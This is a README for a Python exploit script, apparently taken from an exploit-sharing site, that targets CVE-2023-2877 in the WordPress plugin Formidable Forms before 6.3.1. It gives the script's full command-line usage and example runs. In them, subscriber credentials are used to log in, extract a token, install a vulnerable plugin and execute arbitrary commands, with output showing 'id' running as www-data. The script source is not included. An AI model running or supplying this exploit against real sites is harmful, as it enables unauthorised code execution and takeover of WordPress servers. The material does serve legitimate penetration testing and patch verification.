Share
## https://sploitus.com/exploit?id=626EC80C-304B-5B0D-A6AA-3D01CD03D528
# CVE-2023-2877
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution


Usage
---

```
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value
```

Example
---

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.
```

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
```

Warning
---
YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got not authentication!